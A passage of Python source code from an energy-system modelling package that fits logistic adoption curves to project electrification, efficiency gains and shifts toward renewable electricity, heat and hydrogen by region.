energy_baseline.columns = energy_baseline.columns.astype(int)\n\n # endregion\n\n ##############################################\n # ESTIMATE ENERGY REDUCTIONS & FUEL SHIFTS #\n ##############################################\n\n # region\n\n # Calculate 'electrification factors' that scale down energy over time due to the\n # lower energy required to produce an equivalent amount of work via electricity\n\n # region\n\n # Load saturation points for energy reduction ratios\n ef_ratio = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ),\n )\n .set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n .loc[\n energy_baseline.index.get_level_values(2).unique(),\n [\n \"biofuels_waste ef ratio\",\n \"biofuels_waste addtl eff\",\n \"coal ef ratio\",\n \"coal addtl eff\",\n \"electricity ef ratio\",\n \"electricity addtl eff\",\n \"heat ef ratio\",\n \"heat addtl eff\",\n \"hydrogen ef ratio\",\n \"na\",\n \"natural gas ef ratio\",\n \"natural gas addtl eff\",\n \"nuclear ef ratio\",\n \"oil ef ratio\",\n \"oil addtl eff\",\n \"wws heat ef ratio\",\n \"wws heat addtl eff\",\n ],\n scenario,\n slice(None),\n [\n \"floor\",\n \"parameter a max\",\n \"parameter a min\",\n \"parameter b max\",\n \"parameter b min\",\n \"saturation point\",\n ],\n ]\n ).sort_index()\n\n parameters = ef_ratio\n\n ef_ratio = ef_ratio[\n ef_ratio.index.get_level_values(4) == \"floor\"\n ].sort_index()\n\n # Clear energy_adoption_curves.csv, and run adoption_projection_demand() to\n # calculate logistics curves for energy reduction ratios\n\n # Clear energy_adoption_curves.csv and energy_ef_ratio.csv\n if os.path.exists(\"podi/data/energy_adoption_curves.csv\"):\n os.remove(\"podi/data/energy_adoption_curves.csv\")\n if os.path.exists(\"podi/data/energy_ef_ratios.csv\"):\n os.remove(\"podi/data/energy_ef_ratios.csv\")\n\n def adoption_projection_demand(\n parameters,\n input_data,\n scenario,\n data_end_year,\n saturation_year,\n proj_end_year,\n ):\n def linear(x, a, b, c, d):\n return a * x + d\n\n def logistic(x, a, 
b, c, d):\n            return c / (1 + np.exp(-a * (x - b))) + d\n\n        # Create x array (year) and y array (linear scale from zero to saturation value)\n        x_data = np.arange(0, proj_end_year - data_end_year + 1, 1)\n        y_data = np.zeros((1, len(x_data)))\n        y_data[:] = np.NaN\n        y_data = y_data.squeeze().astype(float)\n        y_data[0] = 0\n        y_data[saturation_year - data_end_year] = parameters.loc[\n            \"saturation point\"\n        ].value.astype(float)\n\n        y_data = np.array((pd.DataFrame(y_data).interpolate()).squeeze())\n\n        # Load search bounds for logistic function parameters\n        search_bounds = [\n            (\n                pd.to_numeric(parameters.loc[\"parameter a min\"].value),\n                pd.to_numeric(parameters.loc[\"parameter a max\"].value),\n            ),\n            (\n                pd.to_numeric(parameters.loc[\"parameter b min\"].value),\n                pd.to_numeric(parameters.loc[\"parameter b max\"].value),\n            ),\n            (\n                pd.to_numeric(parameters.loc[\"saturation point\"].value),\n                pd.to_numeric(parameters.loc[\"saturation point\"].value),\n            ),\n            (\n                0,\n                0,\n            ),\n        ]\n\n        # Define sum of squared error function\n        def sum_of_squared_error(parameters):\n            return np.sum((y_data - logistic(x_data, *parameters)) ** 2.0)\n\n        # Generate genetic_parameters. For baseline scenarios, projections are linear\n        if scenario == \"baseline\":\n            y = linear(\n                x_data,\n                min(\n                    0.0018,\n                    max(0.00001, ((y_data[-1] - y_data[0]) / len(y_data))),\n                ),\n                0,  # b is unused by linear(); passed so the call matches its signature\n                0,  # c is likewise unused by linear()\n                (y_data[-1]),\n            )\n            genetic_parameters = [0, 0, 0, 0]\n        else:\n            genetic_parameters = differential_evolution(\n                sum_of_squared_error,\n                search_bounds,\n                seed=3,\n                polish=False,\n                updating=\"immediate\",\n                mutation=(0, 1),\n            ).x\n\n            # only overwrite y with the fitted logistic curve here, so the linear\n            # baseline projection above is not discarded\n            y = np.array(logistic(x_data, *genetic_parameters))\n\n        pd.concat(\n            [\n                pd.DataFrame(\n                    np.array(\n                        [\n                            input_data.name[0],\n                            input_data.name[1],\n                            input_data.name[2],\n                            input_data.name[3],\n                        ]\n                    )\n                ).T,\n                pd.DataFrame(y).T,\n            ],\n            axis=1,\n        ).to_csv(\n            \"podi/data/energy_adoption_curves.csv\",\n            mode=\"a\",\n            header=None,\n            index=False,\n        )\n\n        return\n\n    ef_ratio.parallel_apply(\n        lambda x: adoption_projection_demand(\n            parameters=parameters.loc[\n                x.name[0], x.name[1], x.name[2], x.name[3]\n            ],\n            input_data=x,\n            scenario=scenario,\n            data_end_year=data_end_year + 1,\n            saturation_year=2050,\n            proj_end_year=proj_end_year,\n        ),\n        axis=1,\n    )\n\n    ef_ratios = (\n        pd.DataFrame(\n            pd.read_csv(\"podi/data/energy_adoption_curves.csv\", header=None)\n        )\n        .set_axis(\n            pd.concat(\n                [\n                    pd.DataFrame(\n                        np.array(\n                            [\"region\", \"product_short\", \"scenario\", \"sector\"]\n                        )\n                    ).T,\n                    pd.DataFrame(\n                        np.linspace(\n                            data_end_year + 1,\n                            proj_end_year,\n                            proj_end_year - data_end_year,\n                        ).astype(int)\n                    ).T,\n                ],\n                axis=1,\n            ).squeeze(),\n            axis=1,\n        )\n        .set_index([\"region\", \"sector\", \"product_short\", \"scenario\"])\n    ).sort_index()\n\n    # Prepare df for multiplication with energy\n    ef_ratios = ef_ratios.parallel_apply(\n        lambda x: 1 - (1 - x.max()) * (x - x.min()) / x.max(), axis=1\n    )\n\n    ef_ratios = (\n        pd.DataFrame(\n            1,\n            index=ef_ratios.index,\n            columns=np.arange(data_start_year, data_end_year + 1, 1),\n        )\n    ).join(ef_ratios)\n    ef_ratios = ef_ratios.loc[:, : energy_baseline.columns[-1]]\n    ef_ratios = ef_ratios.sort_index()\n\n    ef_ratios.to_csv(\"podi/data/energy_ef_ratios.csv\")\n\n    # Add labels to ef_ratios\n    labels = (\n        (\n            pd.DataFrame(\n                pd.read_csv(\n                    \"podi/data/product_flow_labels.csv\",\n                    usecols=[\n                        \"product_short\",\n                        \"flow_short\",\n                        \"sector\",\n                        \"WWS EF Product\",\n                        \"WWS Upstream Product\",\n                        \"WWS Addtl Efficiency\",\n                    ],\n                )\n            ).set_index([\"sector\", \"WWS EF Product\"])\n        )\n        .rename_axis(index={\"WWS EF Product\": 
\"product_short\"})\n .rename(columns={\"product_short\": \"IEA Product\"})\n ).sort_index()\n\n # for rows where sector is 'Forests & Wetlands', set flow_short to 'FOREST'\n labels.loc[\n labels.index.get_level_values(\"sector\") == \"Forests & Wetlands\",\n \"flow_short\",\n ] = \"FOREST\"\n\n ef_ratios = (\n (\n ef_ratios.reset_index()\n .set_index([\"sector\", \"product_short\"])\n .merge(labels, on=[\"sector\", \"product_short\"])\n .set_index(\n [\n \"region\",\n \"scenario\",\n \"IEA Product\",\n \"flow_short\",\n \"WWS Upstream Product\",\n \"WWS Addtl Efficiency\",\n ],\n append=True,\n )\n )\n .droplevel([\"product_short\", \"scenario\"])\n .reorder_levels(\n [\n \"region\",\n \"sector\",\n \"IEA Product\",\n \"flow_short\",\n \"WWS Upstream Product\",\n \"WWS Addtl Efficiency\",\n ]\n )\n )\n\n # Remove duplicate indices\n ef_ratios = ef_ratios[~ef_ratios.index.duplicated()]\n\n # endregion\n\n # Calculate 'upstream ratios' that scale down energy over time due to the lower\n # energy required for fossil fuel/biofuel/bioenergy/uranium mining/transport\n # /processing. Note that not all upstream fossil energy is eliminiated, since some\n # upstream energy is expected to remain to produce fossil fuel flows for non-energy\n # use.\n\n # region\n\n upstream_ratios = ef_ratios.copy()\n\n upstream_ratios.update(\n upstream_ratios[upstream_ratios.index.get_level_values(4) == \"Y\"]\n .parallel_apply(\n lambda x: 1 - (x.max() - x) / (x.max() - x.min()), axis=1\n )\n .fillna(0)\n )\n\n # Set upstream ratios in ef_ratios to 1 so upstream reduction is not double counted\n ef_ratios[ef_ratios.index.get_level_values(4) == \"Y\"] = 1\n ef_ratios = ef_ratios.sort_index()\n\n upstream_ratios[upstream_ratios.index.get_level_values(4) == \"N\"] = 1\n upstream_ratios = upstream_ratios.sort_index()\n\n # endregion\n\n # Reduce energy by the upstream energy reductions from fossil fuel/biofuel/bioenergy\n # /uranium mining/transport/processing\n\n # region\n\n energy_post_upstream = energy_baseline.parallel_apply(\n lambda x: x.mul(\n upstream_ratios.loc[\n x.name[2], x.name[3], x.name[6], x.name[9]\n ].squeeze()\n ),\n axis=1,\n )\n energy_post_upstream.rename(index={\"baseline\": scenario}, inplace=True)\n\n # endregion\n\n # Apply percentage reduction attributed to additional energy efficiency measures\n\n # region\n\n addtl_eff = pd.DataFrame(\n pd.read_csv(\"podi/data/energy_ef_ratios.csv\")\n ).set_index([\"scenario\", \"region\", \"sector\", \"product_short\"])\n addtl_eff.columns = addtl_eff.columns.astype(int)\n\n labels = (\n labels.reset_index()\n .drop(columns=[\"WWS Upstream Product\", \"product_short\"])\n .set_index([\"sector\", \"WWS Addtl Efficiency\"])\n .rename_axis(index={\"WWS Addtl Efficiency\": \"product_short\"})\n .rename(columns={\"product_short\": \"IEA Product\"})\n )\n\n addtl_eff = (\n (\n addtl_eff.reset_index()\n .set_index([\"sector\", \"product_short\"])\n .merge(labels, on=[\"sector\", \"product_short\"])\n .set_index(\n [\n \"region\",\n \"scenario\",\n \"IEA Product\",\n \"flow_short\",\n ],\n append=True,\n )\n )\n .droplevel([\"product_short\", \"scenario\"])\n .reorder_levels([\"region\", \"sector\", \"IEA Product\", \"flow_short\"])\n )\n\n addtl_eff = addtl_eff.groupby(\n [\"region\", \"sector\", \"IEA Product\", \"flow_short\"], observed=True\n ).mean()\n\n # Remove duplicate indices\n addtl_eff = addtl_eff[~addtl_eff.index.duplicated()]\n addtl_eff = addtl_eff.sort_index()\n\n energy_post_addtl_eff = energy_post_upstream.parallel_apply(\n lambda x: x.mul(\n 
addtl_eff.loc[x.name[2], x.name[3], x.name[6], x.name[9]].squeeze()\n ),\n axis=1,\n )\n\n # endregion\n\n # Estimate energy reduction and fuel shifts due to electrification\n\n # region\n\n # Isolate the energy that gets replaced with (a reduced amount of) energy from\n # electricity. Each row of energy is multiplied by\n # ((ef[0] - ef[i]) / (ef[0] - ef[-1]), which represents the percent of energy that\n # undergoes electrification in each year. This does not count preexisting\n # electricity, except for nuclear, which is estimated to shift to renewables, and\n # is treated in subsequent steps.\n energy_electrified = energy_post_addtl_eff.parallel_apply(\n lambda x: x.mul(\n (\n (\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[0]\n - ef_ratios.loc[\n x.name[2], x.name[3], x.name[6], x.name[9]\n ].squeeze()\n )\n / (\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[0]\n - ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[-1]\n )\n ).fillna(0)\n ),\n axis=1,\n )\n\n # Find the reduced amount of electrical energy that represents an equivalent amount\n # of work to that of the energy that undergoes electrification.\n energy_reduced_electrified = energy_electrified.parallel_apply(\n lambda x: x.mul(\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[-1]\n ),\n axis=1,\n )\n\n # Find the electrical energy from fossil fuels assumed to shift to renewables\n renewables = [\n \"GEOTHERM\",\n \"HYDRO\",\n \"SOLARPV\",\n \"ROOFTOP\",\n \"SOLARTH\",\n \"OFFSHORE\",\n \"ONSHORE\",\n \"TIDE\",\n ]\n\n energy_reduced_electrified = pd.concat(\n [\n energy_reduced_electrified,\n pd.concat(\n [\n energy_post_addtl_eff[\n ~energy_post_addtl_eff.index.get_level_values(6).isin(\n renewables\n )\n ]\n .loc[\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n [\"Electricity output\"],\n :,\n ]\n .loc[:, :data_end_year]\n * 0,\n energy_post_addtl_eff[\n ~energy_post_addtl_eff.index.get_level_values(6).isin(\n renewables\n )\n ]\n .loc[\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n [\"Electricity output\"],\n :,\n ]\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n ),\n ]\n )\n\n # Relabel reduced amount of energy as RELECTR or HYDROGEN\n energy_reduced_electrified2 = (\n energy_reduced_electrified.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n .reset_index()\n )\n\n energy_reduced_electrified_e = energy_reduced_electrified2[\n energy_reduced_electrified2[\"hydrogen\"] == \"N\"\n ]\n energy_reduced_electrified_e[\"product_category\"] = \"Electricity and Heat\"\n energy_reduced_electrified_e[\"product_long\"] = \"Renewable Electricity\"\n energy_reduced_electrified_e[\"product_short\"] = \"RELECTR\"\n\n energy_reduced_electrified_h = energy_reduced_electrified2[\n energy_reduced_electrified2[\"hydrogen\"] == \"Y\"\n ]\n energy_reduced_electrified_h[\"product_category\"] = \"Hydrogen\"\n energy_reduced_electrified_h[\"product_long\"] = \"Hydrogen\"\n energy_reduced_electrified_h[\"product_short\"] = \"HYDROGEN\"\n\n energy_reduced_electrified3 = pd.concat(\n [energy_reduced_electrified_e, energy_reduced_electrified_h]\n )\n\n 
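# NOTE: energy_reduced_electrified_e/_h above are boolean-mask slices of\n    # energy_reduced_electrified2, so assigning new columns to them can trigger\n    # pandas' SettingWithCopyWarning; taking an explicit .copy() of each slice\n    # before the assignments makes the intent clear.\n    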
energy_reduced_electrified3.set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n inplace=True,\n )\n\n # Add this reduced level of electrical energy to overall energy, which is\n # energy_post_addtl with the fossil fuel energy removed (energy_electrified)\n energy_post_electrification = (\n pd.concat(\n [\n energy_post_addtl_eff.subtract(energy_electrified),\n energy_reduced_electrified3,\n ]\n )\n .groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n )\n # endregion\n\n # endregion\n\n #####################################\n # ESTIMATE UPDATED ELECTRICITY MIX #\n #####################################\n\n # region\n # For each region, find the percent of total electricity consumption met by each\n # renewable product.\n elec_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Electricity output\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == \"N\").values)\n ]\n\n per_elec_supply = elec_supply.parallel_apply(\n lambda x: x.divide(\n elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total electricity consumption met by each renewable\n # product to estimate projected percent of total electricity consumption each meets\n parameters = pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ).set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n parameters = parameters.sort_index()\n\n def adoption_projection(\n input_data,\n saturation_date,\n output_end_date,\n change_model,\n change_parameters,\n ):\n def linear(x, a, b, c, d):\n return a * x + d\n\n def logistic(x, a, b, c, d):\n return c / (1 + np.exp(-a * (x - b))) + d\n\n # Take 10 years prior data to fit logistic function\n x_data = np.arange(\n 0, output_end_date - input_data.last_valid_index() + 11, 1\n )\n y_data = np.zeros((1, len(x_data)))\n y_data[:, :] = np.NaN\n y_data = y_data.squeeze().astype(float)\n y_data[:11] = input_data.loc[\n input_data.last_valid_index() - 10 : input_data.last_valid_index()\n ]\n y_data[\n saturation_date - input_data.last_valid_index()\n ] = change_parameters.loc[\"saturation point\"].value.astype(float)\n\n # Handle cases where saturation point is below current value, by making\n # saturation point equidistant from current value but in positive direction\n if y_data[10] > y_data[-1]:\n y_data[-1] = y_data[10] + abs(y_data[-1] - y_data[10])\n\n y_data = np.array(\n (pd.DataFrame(y_data).interpolate(method=\"linear\")).squeeze()\n )\n\n # Load search bounds for logistic function parameters\n search_bounds = [\n (\n pd.to_numeric(change_parameters.loc[\"parameter a min\"].value),\n pd.to_numeric(change_parameters.loc[\"parameter a max\"].value),\n ),\n (\n pd.to_numeric(change_parameters.loc[\"parameter b min\"].value),\n pd.to_numeric(change_parameters.loc[\"parameter b max\"].value),\n ),\n (\n 
pd.to_numeric(change_parameters.loc[\"saturation point\"].value),\n pd.to_numeric(change_parameters.loc[\"saturation point\"].value),\n ),\n (\n y_data[10],\n y_data[10],\n ),\n ]\n\n # Define sum of squared error function\n def sum_of_squared_error(change_parameters):\n return np.sum(\n (y_data - logistic(x_data, *change_parameters)) ** 2.0\n )\n\n # Generate genetic_parameters. For baseline scenarios, projections are linear\n if change_model == \"linear\":\n y = linear(\n x_data,\n min(\n 0.04,\n max(0.00001, ((y_data[-1] - y_data[0]) / len(y_data))),\n ),\n 0,\n 0,\n y_data[10],\n )\n genetic_parameters = [0, 0, 0, 0]\n else:\n genetic_parameters = differential_evolution(\n sum_of_squared_error,\n search_bounds,\n seed=3,\n polish=False,\n updating=\"immediate\",\n mutation=(0, 1),\n ).x\n\n y = np.array(logistic(np.arange(0, 500, 1), *genetic_parameters))\n\n # Rejoin with input data at point where projection curve results in smooth\n # growth\n y = np.concatenate(\n [\n input_data.loc[: input_data.last_valid_index()].values,\n y[\n y >= input_data.loc[input_data.last_valid_index()]\n ].squeeze(),\n ]\n )[: (output_end_date + 1 - input_data.first_valid_index())]\n\n return pd.Series(\n data=y[\n : len(\n np.arange(\n input_data.first_valid_index(), output_end_date + 1, 1\n )\n )\n ],\n index=np.arange(\n input_data.first_valid_index(), output_end_date + 1, 1\n ),\n name=input_data.name,\n )\n\n per_elec_supply.update(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Estimate the rate of nonrenewable electricity generation being replaced by\n # renewable electricity generation\n nonrenewable_to_renewable = pd.concat(\n [\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, :data_end_year]\n * 0,\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n )\n\n # Update nonrenewables electricity generation\n nonrenew = pd.concat(\n [\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n 1\n - per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, :data_end_year]\n * 0,\n elec_supply[\n 
~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n 1\n - per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n )\n\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ] = elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ].parallel_apply(\n lambda x: (x + nonrenew.loc[x.name]).clip(lower=0), axis=1\n )\n\n # Set renewables generation to meet RELECTR in the proportion estimated by\n # adoption_projection(), and nonrenewable electricity generation that shifts to\n # renewable generation\n elec_supply.update(\n pd.concat(\n [\n elec_supply[\n elec_supply.index.get_level_values(6).isin(renewables)\n ].loc[:, :data_end_year],\n +per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: x.multiply(\n nonrenewable_to_renewable.groupby(\n [\"region\"], observed=True\n )\n .sum(0)\n .loc[x.name[2]]\n + elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :],\n ],\n axis=1,\n )\n )\n\n # Recast RELECTR to ELECTR in Final consumption\n energy_post_electrification.reset_index(inplace=True)\n energy_post_electrification[\n (energy_post_electrification[\"product_short\"] == \"RELECTR\")\n & (energy_post_electrification[\"flow_category\"] == \"Final consumption\")\n ] = (\n energy_post_electrification[\n (energy_post_electrification[\"product_short\"] == \"RELECTR\")\n & (\n energy_post_electrification[\"flow_category\"]\n == \"Final consumption\"\n )\n ]\n .replace({\"RELECTR\": \"ELECTR\"})\n .replace({\"Renewable Electricity\": \"Electricity\"})\n )\n\n energy_post_electrification.set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ]\n )\n\n energy_post_electrification = energy_post_electrification.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n ).sum(numeric_only=True)\n\n energy_post_electrification.drop(labels=\"RELECTR\", level=6, inplace=True)\n\n # Drop RELECTR now that it has been reallocated to the specific set of renewables\n elec_supply.drop(labels=\"RELECTR\", level=6, inplace=True)\n\n # Recalculate percent of total consumption each technology meets\n per_elec_supply = elec_supply.parallel_apply(\n lambda x: x.divide(\n elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Recalculate elec_supply to cover energy_post_electrification product_long =\n # \"Electricity\" flow_category = \"Final consumption\"\n elec_supply = per_elec_supply.parallel_apply(\n lambda x: x.multiply(\n energy_post_electrification[\n (\n (\n 
energy_post_electrification.reset_index().product_long\n == \"Electricity\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Final consumption\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().nonenergy\n == \"N\"\n ).values\n )\n ]\n .groupby([\"model\", \"scenario\", \"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[0], x.name[1], x.name[2]]\n ),\n axis=1,\n )\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(elec_supply)\n\n # endregion\n\n ##############################\n # ESTIMATE UPDATED HEAT MIX #\n ##############################\n\n # region\n\n renewables = [\"GEOTHERM\", \"SOLARTH\"]\n\n # For each region, for each subsector ('Low Temperature', 'High Temperature'), find\n # the percent of total heat consumption met by each renewable product. heat_supply\n # is 'Heat output' from the 'Electricity and Heat' product category, plus other\n # products that are consumed within residential, commercial, and industrial sectors\n # directly for heat.\n heat_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Heat output\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == \"N\").values)\n ]\n\n per_heat_supply = heat_supply.parallel_apply(\n lambda x: x.divide(\n heat_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total heat consumption met by each renewable\n # product to estimate projected percent of total heat consumption each meets\n per_heat_supply.update(\n per_heat_supply[\n per_heat_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Set renewables heat generation to meet the amount estimated in Jacobson et al.\n # (2016) to provide storage services.\n heat_supply.update(\n per_heat_supply[\n per_heat_supply.index.get_level_values(6).isin(renewables)\n ].parallel_apply(\n lambda x: x.multiply(\n heat_supply[\n heat_supply.index.get_level_values(6).isin(renewables)\n ]\n .groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n )\n\n # Recalculate percent of total consumption each technology meets\n per_heat_supply = heat_supply.parallel_apply(\n lambda x: x.divide(\n heat_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(heat_supply)\n\n # endregion\n\n ###############################################\n # ESTIMATE UPDATED NONELECTRIC TRANSPORT MIX #\n ###############################################\n\n # region\n\n renewables = [\"HYDROGEN\"]\n\n # For each region, find the percent of total nonelectric energy consumption met by\n # each product.\n transport_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().sector\n == \"Transportation\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Final consumption\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == 
\"N\").values)\n ]\n\n per_transport_supply = transport_supply.parallel_apply(\n lambda x: x.divide(\n transport_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total nonelectric transport consumption met by each\n # renewable product to estimate projected percent of total heat consumption each\n # meets\n per_transport_supply.update(\n per_transport_supply[\n per_transport_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Set renewables nonelectric transport generation to meet the amount estimated\n transport_supply.update(\n per_transport_supply[\n per_transport_supply.index.get_level_values(6).isin(renewables)\n ].parallel_apply(\n lambda x: x.multiply(\n transport_supply[\n transport_supply.index.get_level_values(6).isin(renewables)\n ]\n .groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n )\n\n # Recalculate percent of total consumption each technology meets\n per_transport_supply = transport_supply.parallel_apply(\n lambda x: x.divide(\n transport_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(transport_supply)\n\n # endregion\n\n #################\n # SAVE OUTPUT #\n #################\n\n # region\n\n # Drop rows that have all zeros\n energy_post_upstream = energy_post_upstream[\n energy_post_upstream.sum(axis=1) != 0\n ]\n energy_post_addtl_eff = energy_post_addtl_eff[\n energy_post_addtl_eff.sum(axis=1) != 0\n ]\n energy_electrified = energy_electrified[\n energy_electrified.sum(axis=1) != 0\n ]\n energy_reduced_electrified = energy_reduced_electrified[\n energy_reduced_electrified.sum(axis=1) != 0\n ]\n energy_post_electrification = energy_post_electrification[\n energy_post_electrification.sum(axis=1) != 0\n ]\n per_elec_supply = per_elec_supply[per_elec_supply.sum(axis=1) != 0]\n per_heat_supply = per_heat_supply[per_heat_supply.sum(axis=1) != 0]\n per_transport_supply = per_transport_supply[\n per_transport_supply.sum(axis=1) != 0\n ]\n\n # Combine percent output for electricity, heat, transport\n energy_percent = pd.concat(\n [per_elec_supply, per_heat_supply, per_transport_supply]\n )\n\n # Combine baseline and pathway energy output, drop 'hydrogen', 'flexible', 'nonenergy' flags:\n energy_output = pd.concat([energy_baseline, energy_post_electrification])\n energy_output.index = 